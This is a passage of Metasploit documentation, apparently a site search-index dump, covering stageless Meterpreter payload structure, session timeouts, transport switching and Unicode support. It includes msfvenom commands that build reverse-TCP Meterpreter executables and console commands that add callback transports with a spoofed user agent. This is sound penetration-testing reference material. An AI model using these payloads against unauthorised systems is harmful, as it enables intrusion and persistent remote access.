    "content": "As with the staged version, stageless Meterpreter payloads begin with a small bootstrapper. However, this bootstrapper looks very different. Staged Meterpreter payload bootstrappers contain shellcode that performs network communications in order to read in the second stage prior to invoking it. The stageless counterparts don’t have this responsibility, as it is instead handled by metsrv itself. As a result, what we know as stage0 completely disappears. Instead, that which is known as stage1 in staged Meterpreter land becomes the bootstrapper for the payload in stageless Meterpreter land. To make this clear, let’s take a look at the process. When creating the payload, Metasploit first reads a copy of the metsrv DLL into memory. It then overwrites the DLL’s DOS header with a selection of shellcode that does the following: . | Performs a simple GetPC routine. | Calculates the location of the ReflectiveLoader() function in metsrv. | Invokes the ReflectiveLoader() function in metsrv. | Calculates the location of the start of a custom Configuration Block that contains information about transports, extensions and extension-specific initialisation scripts. This configuration block appears in memory immediately after metsrv. | Invokes DllMain() on metsrv, passing in DLL_METASPLOIT_ATTACH along with the pointer to the configuration block. This is where metsrv takes over. | . With this shellcode stub wired into the DOS header, Metasploit adds the entire binary blob to an in-memory payload buffer and then iterates through the list of chosen extensions. For each extension that is specified, Metasploit does the following: . | Loads the extension DLL into memory. | Calculates the size of the DLL. | Writes the size of the DLL as a 32-bit value to the configuration block. | Writes the entire body of the DLL, as-is, to the end of the configuration block. | . Once the end of the list of extensions is reached, the last thing that is written to the payload buffer is a 32-bit representation of 0 (NULL) which indicates that the list of extensions has been terminated. This NULL value is what metsrv will look for when iterating through the list of extensions so that it knows when to stop. After this, any extension initialisation scripts are wired in (though that’s beyond the scope of this article). The final payload layout looks like the following: . +-+--------+-----------------------------------------------------------+ | | Configuration Block |b|+-----------+-+---------+-+---------+-------+-----------+-+|o|| session |S|S| |N||o| metsrv || and |i| ext 1 |i| ext 2 | ... | ext inits |U||t|| transport |z|z| |L|| || config |e|e| |L|| |+-----------+-+---------+-+---------+-------+-----------+-+| +-+--------+-----------------------------------------------------------+ . This payload can be embedded in an exe file, encoded, thrown into an exploit (assuming there’s room!), and who knows what else! The important thing is that we now have all of the bits that we need in the one payload. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-stageless-mode.html#what-does-stageless-meterpreter-look-like",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-stageless-mode.html#what-does-stageless-meterpreter-look-like"
  },"640": {
    "doc": "Stageless Mode",
    "title": "How do I use stageless Meterpreter?",
    "content": "Firstly, it has a different name! It follows the same convention as all of the other staged vs stageless payloads: . | Payload | Staged | Stageless | . | Reverse TCP | windows/meterpreter/reverse_tcp | windows/meterpreter_reverse_tcp | . | Reverse HTTPS | windows/meterpreter/reverse_https | windows/meterpreter_reverse_https | . | Bind TCP | windows/meterpreter/bind_tcp | windows/meterpreter_bind_tcp | . | Reverse TCP IPv6 | windows/meterpreter/reverse_ipv6_tcp | windows/meterpreter_reverse_ipv6_tcp | . To create a payload using one of these babies, you use msfvenom just like you would any other payload. To make a stageless payload that contains only metsrv we do the following: . $ ./msfvenom -p windows/meterpreter_reverse_tcp LHOST=172.16.52.1 LPORT=4444 -f exe -o stageless.exe . To add extensions to the payload, we can make use of the EXTENSIONS parameter, which takes a comma-separated list of extension names. $ ./msfvenom -p windows/meterpreter_reverse_tcp LHOST=172.16.52.1 LPORT=4444 EXTENSIONS=stdapi,priv -f exe -o stageless.exe . With a payload created, we can set up a listener which will handle the connection using msfconsole. Note that the EXTENSIONS parameter isn’t set in the handler. This is because the handler isn’t responsible for them as they’re already in the payload binary. When a session is established, you’ll also note the lack of the “Sending stage …” message! This shows that the upload of stage1 didn’t happen as it’s not needed. If the payload that was invoked also contained stdapi and priv, then absolutely no uploads have occurred at this point. Congratulations, you’re dancing with stageless Meterpreter! . At this point, all of the pre-loaded extensions have been loaded into Meterpreter and are available for use. However, Metasploit is yet to know about them. To initiate client-site wiring of any of the pre-loaded extensions, the user can just type use &amp;lt;extension&amp;gt; just like they used to. Metasploit will check to see if the extension already exists in the target instance, and if it does, it will skip the extension upload and just wire-up the functions on the client side. If the extension is missing, then it will upload it and wire-up the functions on the fly just like it always has done. If you’re working with meterpreter_reverse_https, you’ll notice that when new shells come in they appear just like an orphaned instance. This is expected behaviour, because a stageless session can’t and won’t look any different to an old session that hasn’t been in touch with Metasploit for a while. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-stageless-mode.html#how-do-i-use-stageless-meterpreter",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-stageless-mode.html#how-do-i-use-stageless-meterpreter"
  },"641": {
    "doc": "Stageless Mode",
    "title": "Stageless Mode",
    "content": "Metasploit has long supported a mixture of staged and stageless payloads within its toolset. The mixture of payloads gives penetration testers a huge collection of options to choose from when performing exploitation. However, one option has been missing from this collection, and that is the notion of a stageless Meterpreter payload. In this post, I’d like to explain what this means, why you should care, and show how the latest update to Metasploit and Meterpreter provides this funky new feature as portended by Tod’s last Wrapup post. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-stageless-mode.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-stageless-mode.html"
  },"642": {
    "doc": "Timeout Control",
    "title": "Meterpreter’s Timeout Values",
    "content": "There are four timeout values that can be controlled by the user, and they are documented in the sections below. Meterpreter Session Timeout . Each instance of Meterpreter has a lifetime that is defined as a session. The length of Meterpeter’s life is defined by a parameter called the Session Timeout. This value can be specified when Meterpreter payloads are generated by using the SessionExpirationTimeout datastore option. The default value used is the equivalent of one whole week (604800 seconds), and hence this is what is used if the user does not override the value manually. The session’s life begins at the point that metsrv (Meterpreter’s core) takes over from the initial stage (if there is one). Once running, the session timer begins, and Meterpeter will monitor this timeout so that as soon as it is reached the session will be closed. If the timeout value is set to zero, this tells Meterpreter to never kill the session. If you’re looking to have Meterpreter run for as long as it can, then setting this value to zero is the way to do it. It’s important to note that this value lives outside of the realms of the other timeout values. That is, this value applies to Meterpreter as a whole, where the other three timeouts are specific to the individual transports that have been configured within the session. Meterpreter Transport Timeouts . Each transport that is configured inside Meterpreter has three timeouts. The are as follows: . Communication Timeout . When Meterpreter talks to Metasploit packets are exchanged at a low level in a request/response fashion. In the case of TCP transports, this req/rep pattern is basically instant because TCP is a persistent connection. A request is handled by Meterpreter, and the response is immediately transferred as soon as the command has finished executing. In the case of HTTP/S payloads it’s slightly different because the protocols are stateless. Meterpreter makes a GET request to Metasploit to check to see if a command has been executed by the user. The command is returned, the connection is closed, and Meterpreter executes the command asynchronously. When the command execution finishes, a second request is made that POSTs the result back to Metasploit so that the user can consume it. Hence, for each command invocation, there are two HTTP/S requests. With TCP transports, communication “times out” when the time between the last packet and the current socket poll is greater than the communications timeout value. This happens when there are network related issues that prevent data from being transmitted between the two endpoints, but doesn’t cause the socket to completely disconnect. With HTTP/S transports, the communication “times out” for the same reason, but the evaluation of the condition is slightly different in that failure can occur because there is either no response at all from the remote server, or the response to a GET request results in no acknowledgement. By default, this value is set to 300 seconds (5 minutes), but can be overridden by the user via the SessionCommunicationTimeout setting. If connectivity fails, or the communication is deemed to have timed out. Then the current transport is destroyed, and the next transport in the list of transports is invoked. From there, Meterpreter will use the Retry Total and Retry Wait values while attempting to re-establish a session with Metasploit. Retry Total and Retry Wait . After a transport initialises inside Meterpreter, Meterpreter uses this transport to attempt to establish a new session with Metasploit. In some cases, Metasploit might not be available due to reasons like bad network connectivity, or a lack of configured listeners. If Meterpreter can’t connect to Metasploit, it will attempt to retry for a period of time. Once that period of time expires, Meterpreter will deem this transport “dead” and will move to the next one in the transport list. The total amount of time that Meterpreter will attempt to connect back to Metasploit on the given transport is indicated by the retry total value. That is, retry total is the total amount of time that Meterpreter will retry communication on the transport. The default value is 3600 seconds (1 hour), and can be overridden via the SessionRetryTotal setting. While the current time is within the retry total time, Meterpreter will constantly attempt to establish connectivity. If it fails, it will wait for a period of time before trying again. The time between retry attempts on the current transport is called retry wait. That is, Meterpreter will wait for the number of seconds specified in retry wait between each connection attempt on the current transport. The default value is 10 seconds, and can be overridden via the SessionRetryWait setting. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-timeout-control.html#meterpreters-timeout-values",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-timeout-control.html#meterpreters-timeout-values"
  },"643": {
    "doc": "Timeout Control",
    "title": "Changing Timeouts",
    "content": "Meterpreter supports the querying and updating of each of these timeouts via the console. In order to get the current timeout settings, users can invoke the get_timeouts command, which returns all four of the current timeout settings (one for the global session, and three for the transport-specific settings). An example of which is shown below: . meterpreter &amp;gt; get_timeouts Session Expiry : @ 2015-06-09 19:56:05 Comm Timeout : 100000 seconds Retry Total Time: 50000 seconds Retry Wait Time : 2500 seconds . The Session Expiry value is rendered as an absolute local time so that the user knows when the session is due to expire. In order to update these values, users can invoke the set_timeouts command. Invoking it without parameters shows the help: . meterpreter &amp;gt; set_timeouts Usage: set_timeouts [options] Set the current timeout options. Any or all of these can be set at once. OPTIONS: -c &amp;lt;opt&amp;gt; Comms timeout (seconds) -h Help menu -t &amp;lt;opt&amp;gt; Retry total time (seconds) -w &amp;lt;opt&amp;gt; Retry wait time (seconds) -x &amp;lt;opt&amp;gt; Expiration timeout (seconds) . As the help implies, each of these settings takes a value that indicates the number of seconds. Each of the options of this command are optional, so the user can update only those values that they are interested in updating. When the command is invoked, Meterpreter is updated, and the result shows the updated values once the changes have been made. In the case of the -x parameter, the value that is to be passed in should represent the total number of seconds from “now” until the session should expire. The following example updates the session expiration timeout to be 2 minutes from “now”, and changes the retry wait time to 3 seconds: . meterpreter &amp;gt; set_timeouts -x 120 -t 3 Session Expiry : @ 2015-06-02 22:45:13 Comm Timeout : 100000 seconds Retry Total Time: 3 seconds Retry Wait Time : 2500 seconds . This command can be invoked any number of times while the session is valid, but as soon as the session has expired, Metepreter will shut down and it’s game over: . meterpreter &amp;gt; [*] 10.1.10.35 - Meterpreter session 2 closed. Reason: Died . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-timeout-control.html#changing-timeouts",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-timeout-control.html#changing-timeouts"
  },"644": {
    "doc": "Timeout Control",
    "title": "Timeout Control",
    "content": "It is now possible to meticulously control a set of timeout-related behaviour in Meterpreter sessions. Timeouts may not seem important, but they change the noise levels of Meterpreter’s communication resiliency features, and allow for the extension/reduction of time of the Meterpreter session as a whole. This document details what those timeouts are, and how to control them. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-timeout-control.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-timeout-control.html"
  },"645": {
    "doc": "Transport Control",
    "title": "On this page",
    "content": ". | Transport configuration | The transport command . | Listing transports | Adding transports | Changing transports | Removing transports | Resilient transports | . | Supported Meterpreters | . The Meterpreter that we have known and loved for years has always had the ability to specify the type of transport that is to be used for the session. reverse_tcp and reverse_https are the favorites. Previously, the flexibility for transport selection is only available at the time the payloads are created, or when the exploit is launched, effectively locking the Meterpreter session into a single type of transport for the lifetime of the session. Recent modifications to Meterpreter have changed this. Meterpreter has a new configuration system that supports multiple transports and it now supports the addition of new transports while the session is still running. With the extra transports configured, Meterpreter allows the user to cycle through those transports without shutting down the session. | Not only that, but Meterpreter will cycle through these transports automatically when communication fails. For more information on the session resiliency features, please view the [[Meterpreter Reliable Network Communication | reliable network communication documentation. | . This document describes how multiple transports are added to an existing Meterpreter session. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-transport-control.html#on-this-page",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-transport-control.html#on-this-page"
  },"646": {
    "doc": "Transport Control",
    "title": "Transport configuration",
    "content": "It is not possible to add multiple transports to payloads or exploits prior to launching them. This is due to the fact that msfvenom the built-in payload mechanisms in Metasploit need to be modified to allow for multiple transports to be selected prior to the generation of the payload. This work is ongoing, and hopefully, it’ll be implemented soon. For now, a single transport has to be chosen, using the same mechanism that has always been in use. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-transport-control.html#transport-configuration",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-transport-control.html#transport-configuration"
  },"647": {
    "doc": "Transport Control",
    "title": "The transport command",
    "content": "Meterpreter has a new base command called transport. This is the hub of all transport-related commands and will allow you to list them, add new ones, cycle through them on the fly, and remove those which are no longer valid or useful. The following output shows the current help text for the transport command: . meterpreter &amp;gt; transport Usage: transport &amp;lt;list|change|add|next|prev|remove&amp;gt; [options] list: list the currently active transports. add: add a new transport to the transport list. change: same as add, but changes directly to the added entry. next: jump to the next transport in the list (no options). prev: jump to the previous transport in the list (no options). remove: remove an existing, non-active transport. OPTIONS: -A &amp;lt;opt&amp;gt; User agent for HTTP/S transports (optional) -B &amp;lt;opt&amp;gt; Proxy type for HTTP/S transports (optional: http, socks; default: http) -C &amp;lt;opt&amp;gt; Comms timeout (seconds) (default: same as current session) -H &amp;lt;opt&amp;gt; Proxy host for HTTP/S transports (optional) -N &amp;lt;opt&amp;gt; Proxy password for HTTP/S transports (optional) -P &amp;lt;opt&amp;gt; Proxy port for HTTP/S transports (optional) -T &amp;lt;opt&amp;gt; Retry total time (seconds) (default: same as current session) -U &amp;lt;opt&amp;gt; Proxy username for HTTP/S transports (optional) -W &amp;lt;opt&amp;gt; Retry wait time (seconds) (default: same as current session) -X &amp;lt;opt&amp;gt; Expiration timeout (seconds) (default: same as current session) -c &amp;lt;opt&amp;gt; SSL certificate path for https transport verification (optional) -h Help menu -i &amp;lt;opt&amp;gt; Specify transport by index (currently supported: remove) -l &amp;lt;opt&amp;gt; LHOST parameter (for reverse transports) -p &amp;lt;opt&amp;gt; LPORT parameter -t &amp;lt;opt&amp;gt; Transport type: reverse_tcp, reverse_http, reverse_https, bind_tcp -u &amp;lt;opt&amp;gt; Local URI for HTTP/S transports (used when adding/changing transports with a custom LURI) -v Show the verbose format of the transport list . Listing transports . The simplest of all the sub-commands in the transport set is list. This command shows the full list of currently enabled transport, and an indicator of which one is the “current” transport. The following shows the non-verbose output with just the default transport running: . meterpreter &amp;gt; transport list Session Expiry : @ 2015-06-09 19:56:05 Curr URL Comms T/O Retry Total Retry Wait ---- --- --------- ----------- ---------- * tcp://10.1.10.40:6000 300 3600 10 . The first part of the output is the session expiry time. To learn more about expiry time, see [Meterpreter Timeout Control][]. The above output shows that we have one transport enabled that is using TCP. We can infer that the transport was a reverse_tcp (rather than bind_tcp) due to the fact that there is a host IP address in the transport URL. If it was a bind_tcp, this would be blank. Comms T/O refers to the communications timeout value. Retry Total is the total time to attempt reconnects on this transport, and Retry Wait indicates how often a retry of the current transport should happen. Each of these is documented in depth in the Timeout documentation. The verbose version of this command shows more detail about the transport, but only in cases where extra detail is available (such as reverse_http/s). The following command shows the output of the list sub-command with the verbose flag (-v) after an HTTP transport has been added: . meterpreter &amp;gt; transport list -v Session Expiry : @ 2015-06-09 19:56:05 Curr URL Comms T/O Retry Total Retry Wait User Agent Proxy Host Proxy User Proxy Pass Cert Hash ---- --- --------- ----------- ---------- ---------- ---------- ---------- ---------- --------- * tcp://10.1.10.40:6000 300 3600 10 http://10.1.10.40:5105/jpdUntK69qiVKZQrwETonAkuobdXaVJovSXlqkvd7s5WB58Xbc3fNoZ5Cld4kAfVJgbVFsgvSpH_N/ 100000 50000 2500 Totes-Legit Browser/1.1 . Adding transports . Adding transports gives Meterpreter the ability to work on different transport mechanisms with the goal of keeping the sessions alive for longer. The command for adding new transports varies slightly depending on the transport that is being added. The following command shows a simple example that adds a reverse_http transport to an existing Meterpreter session. It specifies a custom communications timeout, retry total and retry wait, and also specifies a custom user-agent string to be used for the HTTP requests: . meterpreter &amp;gt; transport add -t reverse_http -l 10.1.10.40 -p 5105 -T 50000 -W 2500 -C 100000 -A \"Totes-Legit Browser/1.1\" [*] Adding new transport ... [+] Successfully added reverse_http transport. This command is what was used to create the transport that was listed in the sample verbose output for the transport list command. Here’s a deeper explanation of the parameters: . | The -t option is what tells Metasploit what type of transport to add. The options are bind_tcp, reverse_tcp, reverse_http and reverse_https. These match those that are used for the construction of the original payloads. Given that we are not dealing with stages, there is no reverse_winhttps because Meterpreter always uses the WinHTTP API behind the scenes anyway. | The -l option specifies what we all know as the LHOST parameter. | The -p option specifies what we all know as the LPORT parameter. | The -T option matches the retry total parameter. The measure of this value is in seconds, and should be a positive integer that is more than -W. | The -W option matches the retry wait parameter. The measure of this value is in seconds and should be a positive integer that is less than -T. | The -C option matches the communication timeout. The measure of this value is in seconds and should be a positive integer. | The -A specifies a custom user agent that is used for HTTP requests. | . It is also possible to specify the following: . | The -u option allows the addition of a local URI (LURI) value that is prepended to the UUID URI that is used for all requests. This URI value helps segregate listeners and payloads based on a URI. | The -H option specifies a proxy host/IP. This parameter is optional. | The -B option specifies a proxy type, and needs to be set to http or socks. If not specified alongside the -H parameter, the default type is http. | The -P option specifies the port that the proxy is listening on. This should be set when -H is set. | The -U option specifies the username to use to authenticate with the proxy. This parameter is optional. | The -N option specifies the password to use to authenticate with the proxy. This parameter is optional. | The -X option specifies the overall Meterpreter session timeout value. While this value is not transport-specific, the option is provided here so that it can be set alongside the other transport-specific timeout values for ease of use. | Finally the -c parameter can be used to indicate the expected SSL certificate. This parameter expects a file path to an SSL certificate in PEM format. The SHA1 hash of the certificate is extracted from the file, and this is used during the request validation process. If this file doesn’t exist or doesn’t contain a valid certificate, then the request should fail. | . The following shows another example which adds another reverse_tcp transport to the transport list: . meterpreter &amp;gt; transport add -t reverse_tcp -l 10.1.10.40 -p 5005 [*] Adding new transport ... [+] Successfully added reverse_tcp transport. meterpreter &amp;gt; transport list Session Expiry : @ 2015-06-09 19:56:05 Curr URL Comms T/O Retry Total Retry Wait ---- --- --------- ----------- ---------- * tcp://10.1.10.40:6000 300 3600 10 http://10.1.10.40:5105/jpdUntK69qiVKZQrwETonAkuobdXaVJovSXlqkvd7s5WB58Xbc3fNoZ5Cld4kAfVJgbVFsgvSpH_N/ 100000 50000 2500 tcp://10.1.10.40:5005 300 3600 10 . Note that these examples only add new transports, they do not change the current transport mechanism. When a transport is added to the list of transports, they are always added at the end of the list, and not the start. Change transports . There are three different ways to change transports. One thing they do have in common is that transport switching assumes that you have listeners set up to receive the connections. If no listener or handler is present, then the resiliency features in Meterpreter will cause it to constantly attempt to establish connectivity on that transport using the transport timeout values that were configured. If the transport ultimately fails, then Meterpreter will cycle to the next transport on the list and try again. This will continue until a transport connection is successful, or the session timeout expires. More information on this can be found in the session resiliency documentation (link coming soon). The three different ways to change transports are: . | transport next - This command will cause Meterpreter to shut down the current transport, and attempt to reconnect to Metasploit using the next transport in the list of transports. | transport prev - This command is the same as transport next, except that it will move to the previous transport on the list, and not the next one. | transport change ... - This command is equivalent to running transport add, and requires all the parameters that transport add requires (resulting in a new transport at the end of the list), and then transport prev (which is the same as going from the start of the list to the end). The net effect is the same as creating a new transport and immediately switching to it. | . As an example, here is the current transport setup: . meterpreter &amp;gt; transport list Session Expiry : @ 2015-06-09 19:56:05 Curr URL Comms T/O Retry Total Retry Wait ---- --- --------- ----------- ---------- * tcp://10.1.10.40:6000 300 3600 10 http://10.1.10.40:5105/jpdUntK69qiVKZQrwETonAkuobdXaVJovSXlqkvd7s5WB58Xbc3fNoZ5Cld4kAfVJgbVFsgvSpH_N/ 100000 50000 2500 tcp://10.1.10.40:5005 300 3600 10 . Moving to the next transport: . meterpreter &amp;gt; transport next [*] Changing to next transport ... [+] Successfully changed to the next transport, killing current session. [*] 10.1.10.35 - Meterpreter session 1 closed. Reason: User exit msf exploit(handler) &amp;gt; [*] 10.1.10.40:46130 (UUID: 8e97549ed2baf6a8/x86_64=2/windows=1/2015-06-02T09:56:05Z) Attaching orphaned/stageless session ... [*] Meterpreter session 2 opened (10.1.10.40:5105 -&amp;gt; 10.1.10.40:46130) at 2015-06-02 20:53:54 +1000 msf exploit(handler) &amp;gt; sessions -i 2 [*] Starting interaction with 2... meterpreter &amp;gt; transport list Session Expiry : @ 2015-06-09 19:56:05 Curr URL Comms T/O Retry Total Retry Wait ---- --- --------- ----------- ---------- * http://10.1.10.40:5105/jpdUntK69qiVKZQrwETonAkuobdXaVJovSXlqkvd7s5WB58Xbc3fNoZ5Cld4kAfVJgbVFsgvSpH_N/ 100000 50000 2500 tcp://10.1.10.40:5005 300 3600 10 tcp://10.1.10.40:6000 300 3600 10 . This output shows that we moved from the original reverse_tcp to the reverse_http transport, and this is now the current transport. Moving to the next transport again takes the session to the second reverse_tcp listener: . meterpreter &amp;gt; transport next [*] Changing to next transport ... [+] Successfully changed to the next transport, killing current session. [*] 10.1.10.35 - Meterpreter session 2 closed. Reason: User exit msf exploit(handler) &amp;gt; [*] Meterpreter session 3 opened (10.1.10.40:5005 -&amp;gt; 10.1.10.35:49277) at 2015-06-02 20:54:45 +1000 msf exploit(handler) &amp;gt; sessions -i 3 [*] Starting interaction with 3... meterpreter &amp;gt; transport list Session Expiry : @ 2015-06-09 19:56:06 Curr URL Comms T/O Retry Total Retry Wait ---- --- --------- ----------- ---------- * tcp://10.1.10.40:5005 300 3600 10 tcp://10.1.10.40:6000 300 3600 10 http://10.1.10.40:5105/jpdUntK69qiVKZQrwETonAkuobdXaVJovSXlqkvd7s5WB58Xbc3fNoZ5Cld4kAfVJgbVFsgvSpH_N/ 100000 50000 2500 . From here, moving backward sends Meterpreter back to the reverse_http listener: . meterpreter &amp;gt; transport prev [*] Changing to previous transport ... [*] 10.1.10.40:46245 (UUID: 8e97549ed2baf6a8/x86_64=2/windows=1/2015-06-02T09:56:05Z) Attaching orphaned/stageless session ... [+] Successfully changed to the previous transport, killing current session. [*] 10.1.10.35 - Meterpreter session 3 closed. Reason: User exit msf exploit(handler) &amp;gt; [*] Meterpreter session 4 opened (10.1.10.40:5105 -&amp;gt; 10.1.10.40:46245) at 2015-06-02 20:55:07 +1000 msf exploit(handler) &amp;gt; sessions -i 4 [*] Starting interaction with 4... meterpreter &amp;gt; transport list Session Expiry : @ 2015-06-09 19:56:05 Curr URL Comms T/O Retry Total Retry Wait ---- --- --------- ----------- ---------- * http://10.1.10.40:5105/jpdUntK69qiVKZQrwETonAkuobdXaVJovSXlqkvd7s5WB58Xbc3fNoZ5Cld4kAfVJgbVFsgvSpH_N/ 100000 50000 2500 tcp://10.1.10.40:5005 300 3600 10 tcp://10.1.10.40:6000 300 3600 10 . Remove transports . It is also possible to remove transports from the underlying transport list. This is valuable in cases where you want Meterpreter to always callback on stageless listeners (allowing you to avoid the unnecessary upload of the second stage), or when you have a listener located at an IP address that may have been blacklisted by your target as a result of your post-exploitation shenanigans. The command is similar to add in that it takes a subset of the parameters, and then adds a new one on top of it: . | -t - The transport type. | -l - The LHOST value (unless it’s bind_tcp). | -p - The LPORT value. | -u - This value is only required for reverse_http/s transports and needs to contain the URI of the transport in question. This is important because there might be multiple listeners on the same IP and port, so the URI is what differentiates each of the sessions. | . [*] Starting interaction with 2... meterpreter &amp;gt; transport list Session Expiry : @ 2015-07-10 07:39:08 Curr URL Comms T/O Retry Total Retry Wait ---- --- --------- ----------- ---------- * tcp://10.1.10.40:5000 300 3600 10 http://10.1.10.40:9090/jYGS61OX8On-Dv8Pq5v9FAJAEobAlrL4J2FBOf_3DsnZzCJAY6-Dh_8AeWdrkFwRbQdvz4vOo8let4huygVLPJ/ 300 3600 10 meterpreter &amp;gt; transport remove -t reverse_http -l 10.1.10.40 -p 9090 -u jYGS61OX8On-Dv8Pq5v9FAJAEobAlrL4J2FBOf_3DsnZzCJAY6-Dh_8AeWdrkFwRbQdvz4vOo8let4huygVLPJ [*] Removing transport ... [+] Successfully removed reverse_http transport. meterpreter &amp;gt; transport list Session Expiry : @ 2015-07-10 07:39:08 Curr URL Comms T/O Retry Total Retry Wait ---- --- --------- ----------- ---------- * tcp://10.1.10.40:5000 300 3600 10 meterpreter &amp;gt; . Resilient transports . Previously, Meterpreter only had built-in resiliency in the HTTP/S payloads and this was due to the nature of HTTP/S as a stateless protocol. Meterpreter now has resiliency features baked into TCP transports as well, both reverse and bind. If communication fails on a given transport, Meterpreter will roll over to the next one automatically. The following shows Metasploit being closed and leaving the existing TCP session running behind the scenes: . meterpreter &amp;gt; transport list Session Expiry : @ 2015-06-09 19:56:05 Curr URL Comms T/O Retry Total Retry Wait ---- --- --------- ----------- ---------- * tcp://10.1.10.40:6000 300 3600 10 http://10.1.10.40:5105/jpdUntK69qiVKZQrwETonAkuobdXaVJovSXlqkvd7s5WB58Xbc3fNoZ5Cld4kAfVJgbVFsgvSpH_N/ 100000 50000 2500 tcp://10.1.10.40:5005 300 3600 10 meterpreter &amp;gt; background [*] Backgrounding session 5... msf exploit(handler) &amp;gt; exit -y . With Metasploit closed, the Meterpreter session has detected that the transport is no longer functioning. Behind the scenes, Meterpreter has shut down this TCP transport, and has automatically moved over to the HTTP transport as this was the next transport in the list. From here, Meterpreter continues to try to re-establish connectivity with Metasploit on this transport a per the transport timeout settings. The following output shows Metasploit being re-launched with the appropriate listeners, and the existing Meterpreter instance establishing a session automatically: ./msfconsole -r ~/msf.rc [*] Starting the Metasploit Framework console...| IIIIII dTb.dTb _.---._ II 4' v 'B .'\"\".'/|\\`.\"\"'. II 6.P : .' / | \\ `. : II 'T;.;P' '.' / | \\ `.' II 'T; ;P' `. / | \\ .' IIIIII 'YvP' `-.__|__.-' I love shells --egypt =[ metasploit v4.11.0-dev [core:4.11.0.pre.dev api:1.0.0]] + -- --=[ 1460 exploits - 835 auxiliary - 229 post ] + -- --=[ 426 payloads - 37 encoders - 8 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] ... snip ... [*] 10.1.10.40:46457 (UUID: 8e97549ed2baf6a8/x86_64=2/windows=1/2015-06-02T09:56:05Z) Attaching orphaned/stageless session ... [*] Meterpreter session 1 opened (10.1.10.40:5105 -&amp;gt; 10.1.10.40:46457) at 2015-06-02 21:03:55 +1000 msf exploit(handler) &amp;gt; sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/win32 WIN-S45GUQ5KGVK\\OJ @ WIN-S45GUQ5KGVK 10.1.10.40:5105 -&amp;gt; 10.1.10.40:46457 (10.1.10.35) msf exploit(handler) &amp;gt; sessions -i 1 [*] Starting interaction with 1... meterpreter &amp;gt; transport list Session Expiry : @ 2015-06-09 19:56:05 Curr URL Comms T/O Retry Total Retry Wait ---- --- --------- ----------- ---------- * http://10.1.10.40:5105/jpdUntK69qiVKZQrwETonAkuobdXaVJovSXlqkvd7s5WB58Xbc3fNoZ5Cld4kAfVJgbVFsgvSpH_N/ 100000 50000 2500 tcp://10.1.10.40:5005 300 3600 10 tcp://10.1.10.40:6000 300 3600 10 . The session is back up and running as if nothing had gone wrong. In the case where Meterpreter is configured with only a single transport mechanism, this process still takes place. Meterpreter’s transport list implementation is a cyclic linked-list, and once the end of the list has been reached, it simply starts from the beginning again. This means that if there’s a list of one transport then Meterpreter will continually attempt to use that one transport until the session expires. This works for both TCP and HTTP/S. For important detail on network resiliency, please see the reliable network communication documentation . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-transport-control.html#the-transport-command",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-transport-control.html#the-transport-command"
  },"648": {
    "doc": "Transport Control",
    "title": "Supported Meterpreters",
    "content": "The following Meterpreter implementations currently support the transport commands: . | Windows x86 | Windows x64 | POSIX x86 | Android | Java | Python | . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-transport-control.html#supported-meterpreters",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-transport-control.html#supported-meterpreters"
  },"649": {
    "doc": "Transport Control",
    "title": "Transport Control",
    "content": " ",
    "url": "/docs/using-metasploit/advanced/meterpreter/meterpreter-transport-control.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/meterpreter-transport-control.html"
  },"650": {
    "doc": "Unicode Support",
    "title": "Unicode Support",
    "content": "Until recently (April 2015), Meterpreter always sent string data in whatever the system encoding happened to be. With the TLV protocol, the TLV_TYPE_STRING was treated roughly as a plain C byte array, with no real expectations as to how the data should be decoded on the Meterpreter or Metasploit framework sides. As a result, type confusion occurred between different locales on remote machines and the local console. To avoid corrupting the terminal due to mistaken character encoding interpretations, Metasploit framework implements Unicode filter that converts any possibly unprintable characters into hex strings. While this allows a sufficiently-advanced human to eyeball a string for meaning, it makes dealing with Unicode strings awkward. To solve the problem, TLV_TYPE_STRING has been retroactively declared to mean UTF-8 encoding only. All Meterpreter implementations should send UTF-8 strings and expect them in requests. On Windows systems, this means that Meterpreter needs to convert to and from Windows’ UTF-16LE implementation. So far, the Filesystem operations on all Meterpreters have been converted to expect a and send UTF-8 strings. Only the PHP meterpreter on Windows lacks Unicode support, due to limitations in PHP itself. All new TLVs should send and receive UTF-8. There is still functionality, that needs conversion beyond the Filesystem APIs, and these can be loosely discovered with a command like grep -R A\\( * to find all ASCII variants of functions called by meterpreter. In the Windows C meterpreter, there are a couple of helper functions to simplify the conversion work: . wchar_t *utf8_to_wchar(const char *in); char *wchar_to_utf8(const wchar_t *in); . These functions both allocate a new string as their return value, so the strings should be freed after use by the caller. Here is an example of a function expanding a path and performing the conversion to and from UTF-8: . char * fs_expand_path(const char *regular) { wchar_t expanded_path[FS_MAX_PATH]; wchar_t *regular_w; regular_w = utf8_to_wchar(regular); if (regular_w == NULL) { return NULL; } if (ExpandEnvironmentStringsW(regular_w, expanded_path, FS_MAX_PATH) == 0) { free(regular_w); return NULL; } free(regular_w); return wchar_to_utf8(expanded_path); } . Unicode support in Metasploit framework today is enabled by default on Linux/Unix systems, since most modern terminal emulators have no trouble displaying the characters. However, on Windows, most native terminal emulators ironically have trouble working with more than one language at once, due to historical code page support. So, for Windows, Unicode characters are still filtered by default. Setting EnableUnicodeEncoding to false 